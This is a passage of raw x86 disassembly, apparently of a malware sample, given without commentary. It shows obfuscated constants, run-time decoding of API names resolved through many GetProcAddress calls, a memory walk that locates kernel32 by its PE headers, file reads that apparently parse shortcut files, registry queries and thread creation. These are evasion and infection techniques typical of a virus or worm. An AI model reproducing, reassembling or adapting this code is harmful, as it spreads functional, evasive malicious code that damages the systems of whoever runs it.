arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, dword_44D0A4
sub esi, 9
jmp short loc_443D17
; ---------------------------------------------------------------------------
loc_443CE5: ; CODE XREF: sub_443CD1+49�j
call ds:dword_44CD90
mov edi, dword_44D0B0
add edi, 56h
add edi, dword_44D094
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
add edi, eax
mov edx, edi
mov [ebx+esi], dl
inc esi
loc_443D17: ; CODE XREF: sub_443CD1+12�j
cmp esi, [ebp+arg_4]
jl short loc_443CE5
mov eax, [ebp+arg_4]
movsx edx, word_44D114
add edx, dword_44D188
sub edx, 12h
mov [ebx+eax], dl
mov eax, ebx
pop edi
pop esi
pop ebx
pop ebp
retn
sub_443CD1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_443D39 proc near ; CODE XREF: sub_43E524+1F3�p
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
push 0
push 0
push 3
push 0
push 0
push 80000000h
push offset dword_44A220
call ds:dword_44C968 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_443D7A
movsx eax, word_44D120
sub eax, 9
mov edx, dword_44D1E0
dec edx
mov [esi+eax], dl
jmp short loc_443DD0
; ---------------------------------------------------------------------------
loc_443D7A: ; CODE XREF: sub_443D39+29�j
push 0
push 0
push [ebp+arg_4]
push edi
call ds:dword_44CD80 ; SetFilePointer
push 0
lea eax, [ebp+var_4]
push eax
mov eax, dword_44D188
add eax, 0Bh
add eax, dword_44D1A0
push eax
push esi
push edi
call ds:dword_44602C ; ReadFile
mov ebx, eax
push edi
call ds:dword_44B82C ; CloseHandle
cmp ebx, dword_44D0D4
jnz short loc_443DD0
mov eax, dword_44D108
add eax, dword_44D134
sub eax, 0Dh
mov edx, dword_44D0D8
sub edx, 5
mov [esi+eax], dl
loc_443DD0: ; CODE XREF: sub_443D39+3F�j
; sub_443D39+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_443D39 endp
; =============== S U B R O U T I N E =======================================
sub_443DD5 proc near ; CODE XREF: sub_44475F+267�p
push edi
push offset byte_44DBCF
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C840, eax
push offset byte_44DBC7
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_447FBC, eax
push offset byte_44DBB3
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_449598, eax
push offset byte_44DBA3
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44A208, eax
push offset dword_44DB94
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C968, eax
push offset byte_44DB85
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_446008, eax
push offset byte_44DB73
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44CD80, eax
push offset word_44DB66
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44CD6C, eax
push offset byte_44DB57
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44B82C, eax
push offset dword_44DB48
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C7F8, eax
push offset dword_44DB3C
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_446000, eax
push offset byte_44DB31
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_449094, eax
push offset word_44DB1A
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44600C, eax
push offset byte_44DB03
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C81C, eax
push offset byte_44DAED
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C7D8, eax
push offset byte_44DADD
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44603C, eax
push offset byte_44DAD1
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44602C, eax
push offset byte_44DAC1
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44A20C, eax
push offset word_44DAB2
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44B804, eax
push offset dword_44DAA4
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4499EC, eax
push offset byte_44DA97
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4495CC, eax
push offset word_44DA86
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44A420, eax
push offset byte_44DA75
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_446030, eax
push offset byte_44DA65
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C950, eax
push offset byte_44DA53
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44A21C, eax
push offset word_44DA42
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_447FB4, eax
push offset byte_44DA35
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4495BC, eax
push offset dword_44DA24
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C844, eax
push offset byte_44DA0F
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C82C, eax
push offset byte_44D9FF
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_447FB0, eax
push offset word_44D9EA
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_449088, eax
push offset byte_44D9DD
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44A534, eax
push offset byte_44D9CD
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C7EC, eax
push offset byte_44D9BF
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44B81C, eax
push offset byte_44D9A9
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44B80C, eax
push offset word_44D992
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4495B0, eax
push offset word_44D97A
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4499F4, eax
push offset word_44D962
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_446010, eax
push offset byte_44D949
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C7E4, eax
push offset word_44D936
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C960, eax
push offset word_44D91E
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C958, eax
push offset byte_44D90D
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44CD78, eax
push offset byte_44D8FB
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4495A8, eax
push offset dword_44D8EC
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44CD7C, eax
push offset byte_44D8D5
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4499F8, eax
push offset byte_44D8BF
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44A204, eax
push offset dword_44D8A4
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44B828, eax
push offset word_44D88A
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C800, eax
push offset word_44D876
call sub_43AC82
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_446038, eax
push offset byte_44D85F
call sub_43AC82
add esp, 0C8h
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C808, eax
pop edi
retn
sub_443DD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_444356 proc near ; CODE XREF: sub_44318C+BA�p
; sub_44318C+F1�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 0Ah
mov edx, 0CCCCCCCDh
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
add edi, 61h
mov ebx, edi
mov [ebp+arg_0], bl
mov al, [ebp+arg_0]
cmp al, 65h
jz short loc_444397
cmp al, 79h
jz short loc_444397
cmp al, 75h
jz short loc_444397
cmp al, 69h
jz short loc_444397
cmp al, 6Fh
jz short loc_444397
cmp al, 61h
jnz short loc_44439B
loc_444397: ; CODE XREF: sub_444356+2B�j
; sub_444356+2F�j ...
add [ebp+arg_0], 1
loc_44439B: ; CODE XREF: sub_444356+3F�j
cmp [ebp+arg_0], 6Ah
jnz short loc_4443A5
add [ebp+arg_0], 1
loc_4443A5: ; CODE XREF: sub_444356+49�j
movzx eax, [ebp+arg_0]
pop edi
pop ebx
leave
retn
sub_444356 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4443AD proc near ; DATA XREF: .data:0044D324�o
push ebp
mov ebp, esp
push offset dword_44C964
call ds:dword_4499F4 ; InterlockedIncrement
mov eax, ds:dword_44C964
pop ebp
retn 4
sub_4443AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4443C4 proc near ; CODE XREF: sub_441F97+173�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
mov esi, [ebp+arg_8]
mov eax, ebx
add eax, 2
mov ecx, 3
mov edx, 0AAAAAAABh
mul edx
shr edx, 1
mov [ebp+var_4], edx
mov edi, edx
shl edi, 2
mov edx, [ebp+arg_C]
dec edx
cmp edi, edx
jbe short loc_44443F
xor eax, eax
jmp loc_4444F1
; ---------------------------------------------------------------------------
loc_4443FC: ; CODE XREF: sub_4443C4+83�j
push esi
push [ebp+arg_0]
call sub_43E2CF
add esp, 8
mov eax, dword_44D170
movsx edx, word_44D220
add eax, edx
sub eax, 9
sub ebx, eax
movsx eax, word_44D11C
dec eax
add eax, [ebp+arg_0]
mov [ebp+arg_0], eax
movsx eax, word_44D194
movsx edx, word_44D23C
add eax, edx
sub eax, 0Ah
lea esi, [esi+eax]
loc_44443F: ; CODE XREF: sub_4443C4+2F�j
mov eax, dword_44D104
dec eax
cmp ebx, eax
jnb short loc_4443FC
movsx eax, word_44D130
add eax, dword_44D1E8
sub eax, 9
cmp ebx, eax
jbe short loc_4444D7
push 3
mov eax, dword_44D0B0
add eax, dword_44D09C
sub eax, 0Ah
push eax
lea eax, [ebp+var_7]
push eax
call ds:dword_44B818
push ebx
push [ebp+arg_0]
lea eax, [ebp+var_7]
push eax
call ds:dword_44B808
push esi
lea eax, [ebp+var_7]
push eax
call sub_43E2CF
add esp, 20h
mov eax, dword_44D15C
add eax, dword_44D158
sub eax, 5
mov byte ptr [esi+eax], 3Dh
mov eax, dword_44D1C8
movsx edx, word_44D110
add eax, edx
dec eax
cmp ebx, eax
jnz short loc_4444C4
mov eax, dword_44D24C
sub eax, 7
mov byte ptr [esi+eax], 3Dh
loc_4444C4: ; CODE XREF: sub_4443C4+F2�j
movsx eax, word_44D0B8
add eax, dword_44D188
sub eax, 0Eh
lea esi, [esi+eax]
loc_4444D7: ; CODE XREF: sub_4443C4+97�j
movsx eax, word_44D1F0
sub eax, 2
movsx edx, word_44D1DC
sub edx, 9
mov [esi+eax], dl
xor eax, eax
inc eax
loc_4444F1: ; CODE XREF: sub_4443C4+33�j
pop edi
pop esi
pop ebx
leave
retn
sub_4443C4 endp
; =============== S U B R O U T I N E =======================================
sub_4444F6 proc near ; DATA XREF: .data:0044D350�o
mov eax, 80004001h
retn 10h
sub_4444F6 endp
; =============== S U B R O U T I N E =======================================
sub_4444FE proc near ; DATA XREF: .data:0044D34C�o
mov eax, 80004001h
retn 8
sub_4444FE endp
; =============== S U B R O U T I N E =======================================
sub_444506 proc near ; DATA XREF: .data:0044D334�o
mov eax, 80004001h
retn 18h
sub_444506 endp
; =============== S U B R O U T I N E =======================================
sub_44450E proc near ; CODE XREF: sub_440CB4+256�p
arg_0 = dword ptr 4
push esi
push edi
mov esi, [esp+8+arg_0]
mov edi, esi
movsx eax, word_44D120
movsx edx, word_44D12C
add eax, edx
sub eax, 0Ah
cmp edi, eax
jge short loc_444558
movsx eax, word_44D0F8
add eax, 4
imul edi, eax
mov eax, dword_44D10C
inc eax
mov edx, esi
add edx, eax
movsx eax, word_44D1F0
add eax, 2
imul edx, eax
sub edi, edx
jmp loc_4446A9
; ---------------------------------------------------------------------------
loc_444558: ; CODE XREF: sub_44450E+1D�j
dec edi
mov eax, dword_44D1BC
add eax, 9
add eax, dword_44D14C
cmp edi, eax
jge short loc_44459B
mov eax, dword_44D248
add eax, dword_44D0EC
sub eax, 4
imul edi, eax
mov eax, edi
sub eax, esi
movsx edx, word_44D190
movsx ecx, word_44D0F4
lea edx, [edx+ecx+1]
mov edi, eax
sub edi, edx
jmp loc_4446A9
; ---------------------------------------------------------------------------
loc_44459B: ; CODE XREF: sub_44450E+5B�j
dec edi
mov eax, dword_44D10C
add eax, 22h
cmp edi, eax
jge short loc_4445CC
movsx eax, word_44D12C
add eax, dword_44D24C
sub eax, 0Eh
imul edi, eax
movsx eax, word_44D114
add eax, 39h
sub edi, eax
jmp loc_4446A9
; ---------------------------------------------------------------------------
loc_4445CC: ; CODE XREF: sub_44450E+98�j
dec edi
movsx eax, word_44D228
add eax, 20h
cmp edi, eax
jge short loc_444607
mov eax, dword_44D1D8
movsx edx, word_44D23C
add eax, edx
sub eax, 6
imul edi, eax
mov eax, dword_44D0BC
add eax, 3Fh
movsx edx, word_44D190
add eax, edx
sub edi, eax
jmp loc_4446A9
; ---------------------------------------------------------------------------
loc_444607: ; CODE XREF: sub_44450E+CB�j
dec edi
mov eax, dword_44D094
add eax, 2Ah
add eax, dword_44D0F0
cmp edi, eax
jge short loc_44463F
movsx eax, word_44D130
add eax, dword_44D134
sub eax, 4
imul edi, eax
mov eax, dword_44D13C
add eax, 4Bh
add eax, dword_44D1A4
sub edi, eax
jmp short loc_4446A9
; ---------------------------------------------------------------------------
loc_44463F: ; CODE XREF: sub_44450E+10A�j
dec edi
movsx eax, word_44D120
add eax, 2Dh
cmp edi, eax
jge short loc_44466D
movsx eax, word_44D0B8
sub eax, 7
imul edi, eax
mov eax, dword_44D150
add eax, 63h
add eax, dword_44D1D0
sub edi, eax
jmp short loc_4446A9
; ---------------------------------------------------------------------------
loc_44466D: ; CODE XREF: sub_44450E+13E�j
dec edi
mov eax, dword_44D134
add eax, 35h
cmp edi, eax
jge short loc_444696
movsx eax, word_44D0E4
imul edi, eax
mov eax, dword_44D14C
add eax, 64h
add eax, dword_44D22C
sub edi, eax
jmp short loc_4446A9
; ---------------------------------------------------------------------------
loc_444696: ; CODE XREF: sub_44450E+16A�j
movsx eax, word_44D114
mov edx, dword_44D1C4
lea eax, [eax+edx+2Fh]
sub edi, eax
loc_4446A9: ; CODE XREF: sub_44450E+45�j
; sub_44450E+88�j ...
mov eax, edi
pop edi
pop esi
retn
sub_44450E endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4446AE proc near ; DATA XREF: sub_43E524+188�o
push ebp
mov ebp, esp
loc_4446B1: ; CODE XREF: sub_4446AE+30�j
call sub_43AB3B
mov eax, dword_44D140
sub eax, 7
mov edx, dword_44D1E0
add edx, 0EA5Bh
movsx ecx, word_44D0E8
add edx, ecx
imul eax, edx
push eax
call ds:dword_44C80C
pop ecx
jmp short loc_4446B1
sub_4446AE endp
; ---------------------------------------------------------------------------
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4446E4 proc near ; DATA XREF: sub_43A39F+16F�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push edi
mov eax, [ebp+arg_4]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4495C8 ; DefWindowProcA
pop edi
pop ebp
retn 10h
sub_4446E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_444702 proc near ; CODE XREF: sub_43F294+19F�p
; sub_43F294+20E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
mov eax, dword_44D0E0
sub eax, 2
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_44959C ; RegOpenKeyExA
mov edi, eax
or edi, edi
jz short loc_44472F
xor eax, eax
jmp short loc_44475C
; ---------------------------------------------------------------------------
loc_44472F: ; CODE XREF: sub_444702+27�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call ds:dword_446044 ; RegQueryValueExA
mov edi, eax
push [ebp+var_4]
call ds:dword_44C7E8 ; RegCloseKey
or edi, edi
jz short loc_444759
xor eax, eax
jmp short loc_44475C
; ---------------------------------------------------------------------------
loc_444759: ; CODE XREF: sub_444702+51�j
xor eax, eax
inc eax
loc_44475C: ; CODE XREF: sub_444702+2B�j
; sub_444702+55�j
pop edi
leave
retn
sub_444702 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44475F proc near ; CODE XREF: start+1�p
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_127 = byte ptr -127h
var_124 = byte ptr -124h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
push edi
lea eax, sub_43A39F
mov [ebp+var_10], eax
mov edx, eax
mov ecx, dword_44D170
add ecx, 0Bh
mov eax, edx
shr eax, cl
mov edx, dword_44D1E0
add edx, 0Ah
add edx, dword_44D1D4
mov ecx, edx
mov ebx, eax
shl ebx, cl
loc_444798: ; CODE XREF: sub_44475F+53�j
; sub_44475F+84�j ...
mov [ebp+var_18], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_4447B4
movsx eax, word_44D148
add eax, 10000h
sub ebx, eax
jmp short loc_444798
; ---------------------------------------------------------------------------
loc_4447B4: ; CODE XREF: sub_44475F+43�j
mov eax, dword_44D198
add eax, 33h
movsx edx, word_44D110
add eax, edx
mov esi, ebx
add esi, eax
mov eax, ebx
add eax, [esi]
mov [ebp+var_14], eax
mov ecx, [ebp+var_10]
cmp eax, ecx
jbe short loc_4447E5
mov eax, dword_44D09C
add eax, 0FFFFh
sub ebx, eax
jmp short loc_444798
; ---------------------------------------------------------------------------
loc_4447E5: ; CODE XREF: sub_44475F+76�j
mov eax, [ebp+var_14]
mov [ebp+var_8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_444809
mov eax, dword_44D0C8
add eax, 0FFFCh
add eax, dword_44D1C8
sub ebx, eax
jmp short loc_444798
; ---------------------------------------------------------------------------
loc_444809: ; CODE XREF: sub_44475F+94�j
mov eax, [ebp+var_8]
mov eax, [eax+80h]
mov [ebp+var_C], eax
mov eax, dword_44D198
add eax, dword_44D0DC
sub eax, 9
mov [ebp+var_4], eax
jmp loc_4449AB
; ---------------------------------------------------------------------------
loc_44482B: ; CODE XREF: sub_44475F+258�j
mov eax, ebx
add eax, [ebp+var_C]
add eax, [ebp+var_4]
mov [ebp+var_12C], eax
mov edx, dword_44D1E0
add edx, dword_44D184
sub edx, 2
cmp [eax], edx
jz loc_4449BD
mov eax, [ebp+var_12C]
mov edx, ebx
add edx, [eax+0Ch]
mov [ebp+var_130], edx
push edx
lea eax, [ebp+var_127]
push eax
call sub_445970
mov eax, dword_44D184
add eax, dword_44D1CC
sub eax, 2
mov [ebp+var_28], eax
jmp short loc_4448A3
; ---------------------------------------------------------------------------
loc_444881: ; CODE XREF: sub_44475F+164�j
mov eax, [ebp+var_28]
mov al, [ebp+eax+var_127]
cmp al, 61h
jle short loc_4448A0
cmp al, 7Ah
jge short loc_4448A0
mov eax, [ebp+var_28]
lea eax, [ebp+eax+var_127]
sub byte ptr [eax], 20h
loc_4448A0: ; CODE XREF: sub_44475F+12E�j
; sub_44475F+132�j
inc [ebp+var_28]
loc_4448A3: ; CODE XREF: sub_44475F+120�j
mov eax, [ebp+var_28]
movsx eax, [ebp+eax+var_127]
movsx edx, word_44D130
movsx ecx, word_44D228
add edx, ecx
sub edx, 6
cmp eax, edx
jnz short loc_444881
mov eax, dword_44D0BC
add eax, dword_44D0CC
cmp byte ptr [ebp+eax+var_130+1], 4Bh
jnz loc_4449A7
mov eax, dword_44D234
cmp byte ptr [ebp+eax+var_12C+3], 45h
jnz loc_4449A7
mov eax, dword_44D1FC
add eax, dword_44D0AC
cmp byte ptr [ebp+eax+var_130+2], 52h
jnz loc_4449A7
mov eax, dword_44D16C
cmp [ebp+eax+var_124], 4Ch
jnz loc_4449A7
mov eax, dword_44D1E4
add eax, dword_44D1EC
cmp [ebp+eax+var_128], 33h
jnz short loc_4449A7
mov eax, dword_44D0B0
add eax, dword_44D1AC
cmp byte ptr [ebp+eax+var_130+2], 32h
jnz short loc_4449A7
mov eax, [ebp+var_12C]
mov edx, ebx
add edx, [eax+10h]
mov [ebp+var_138], edx
mov eax, dword_44D0D4
mov [ebp+var_134], eax
loc_444963: ; CODE XREF: sub_44475F+244�j
mov eax, [ebp+var_138]
mov esi, eax
add esi, [ebp+var_134]
mov edi, [esi]
mov eax, dword_44D24C
add eax, dword_44D0E0
sub eax, 0Bh
cmp edi, eax
jz short loc_4449BD
push edi
call sub_4421FA
pop ecx
cmp dword_44D254, 0
jnz short loc_4449BD
movsx eax, word_44D1B8
dec eax
add [ebp+var_134], eax
jmp short loc_444963
; ---------------------------------------------------------------------------
jmp short loc_4449BD
; ---------------------------------------------------------------------------
loc_4449A7: ; CODE XREF: sub_44475F+179�j
; sub_44475F+18C�j ...
add [ebp+var_4], 14h
loc_4449AB: ; CODE XREF: sub_44475F+C7�j
mov eax, [ebp+var_8]
mov eax, [eax+84h]
cmp [ebp+var_4], eax
jb loc_44482B
loc_4449BD: ; CODE XREF: sub_44475F+EB�j
; sub_44475F+224�j ...
cmp dword_44D254, 0
jz short loc_444A1A
call sub_443DD5
call sub_442ADD
call sub_4430CE
mov edx, eax
mov [ebp+var_19], dl
movzx eax, [ebp+var_19]
mov edx, dword_44D13C
sub edx, 6
cmp eax, edx
jz short loc_444A1A
lea eax, [ebp+var_24]
push eax
movsx eax, word_44D190
sub eax, 5
push eax
lea eax, [ebp+var_20]
push eax
push offset sub_43A39F
mov eax, dword_44D0DC
add eax, dword_44D108
sub eax, 9
push eax
push 0
call ds:dword_44CD70 ; CreateThread
loc_444A1A: ; CODE XREF: sub_44475F+265�j
; sub_44475F+28A�j
pop edi
pop esi
pop ebx
leave
retn
sub_44475F endp
; =============== S U B R O U T I N E =======================================
sub_444A1F proc near ; DATA XREF: .data:0044D354�o
mov eax, 80004001h
retn 18h
sub_444A1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_444A27 proc near ; CODE XREF: sub_43AE0A+108�p
; sub_43B947+179�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
movsx esi, word_44D110
lea eax, [ebp+var_4]
push eax
push offset dword_44EC24
mov eax, [ebp+arg_0]
push eax
mov ebx, [eax]
call dword ptr ds:0[ebx]
mov edi, eax
mov eax, dword_44D16C
sub eax, 2
cmp edi, eax
jz short loc_444A5E
xor eax, eax
jmp short loc_444AC9
; ---------------------------------------------------------------------------
loc_444A5E: ; CODE XREF: sub_444A27+31�j
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+10h]
mov edi, eax
mov eax, dword_44D124
add eax, dword_44D134
sub eax, 6
cmp edi, eax
jnz short loc_444ABE
push [ebp+arg_C]
push [ebp+arg_4]
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+14h]
mov edi, eax
mov eax, dword_44D1CC
add eax, dword_44D238
sub eax, 0Ah
cmp edi, eax
jnz short loc_444AB5
mov eax, dword_44D154
mov esi, eax
add esi, dword_44D234
sub esi, 5
loc_444AB5: ; CODE XREF: sub_444A27+7C�j
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_444ABE: ; CODE XREF: sub_444A27+59�j
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, esi
loc_444AC9: ; CODE XREF: sub_444A27+35�j
pop edi
pop esi
pop ebx
leave
retn
sub_444A27 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_444ACE proc near ; CODE XREF: sub_43D16C+18F�p
var_12110 = byte ptr -12110h
var_1210C = word ptr -1210Ch
var_1210A = word ptr -1210Ah
var_12108 = dword ptr -12108h
var_12104 = byte ptr -12104h
var_12000 = word ptr -12000h
var_11FFE = byte ptr -11FFEh
var_1FFF = byte ptr -1FFFh
var_1FB3 = byte ptr -1FB3h
var_1FB2 = byte ptr -1FB2h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 12110h
call sub_445950
push ebx
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12104]
push eax
call sub_445970
lea ecx, [ebp+var_12104]
or eax, 0FFFFFFFFh
loc_444AF6: ; CODE XREF: sub_444ACE+2D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_444AF6
mov ebx, dword_44D198
sub ebx, 8
mov esi, eax
sub esi, ebx
mov ebx, dword_44D234
movsx edx, word_44D1C0
add ebx, edx
sub ebx, 0Ch
mov [ebp+esi+var_12104], bl
push 0
mov eax, dword_44D150
sub eax, 2
push eax
push 3
push 0
mov eax, dword_44D0A4
sub eax, 9
push eax
push 80000001h
lea eax, [ebp+var_12104]
push eax
call ds:dword_44C968 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_444D93
push 0
lea eax, [ebp+var_12110]
push eax
push 1FFFh
lea eax, [ebp+var_1FFF]
push eax
push edi
call ds:dword_44602C ; ReadFile
mov [ebp+var_12108], eax
push edi
call ds:dword_44B82C ; CloseHandle
mov eax, dword_44D124
movsx edx, word_44D128
add eax, edx
sub eax, 7
cmp [ebp+var_12108], eax
jz loc_444D93
cmp [ebp+var_1FFF], 4Ch
jnz loc_444D93
movzx esi, [ebp+var_1FB3]
movzx ebx, [ebp+var_1FB2]
movzx ebx, bx
shl ebx, 8
or esi, ebx
mov [ebp+var_1210A], si
movzx eax, [ebp+var_1210A]
movsx edx, word_44D1F0
lea eax, [eax+edx+4Ah]
movsx edx, word_44D148
add edx, dword_44D124
add eax, edx
mov [ebp+var_12000], ax
movzx eax, [ebp+var_12000]
movsx eax, [ebp+eax+var_1FFF]
mov edx, dword_44D0B0
sub edx, 9
cmp eax, edx
jz loc_444D93
movzx eax, [ebp+var_12000]
mov edx, dword_44D1FC
add edx, 4
add eax, edx
movsx eax, [ebp+eax+var_1FFF]
mov edx, dword_44D1C4
add edx, dword_44D1E8
sub edx, 7
cmp eax, edx
jnz loc_444D93
movzx eax, [ebp+var_12000]
movsx edx, word_44D164
mov ecx, dword_44D22C
lea edx, [edx+ecx+8]
mov ecx, eax
add ecx, edx
movzx edx, [ebp+ecx+var_1FFF]
movsx esi, word_44D148
movsx ebx, word_44D1B8
lea esi, [esi+ebx+0Ch]
mov ebx, eax
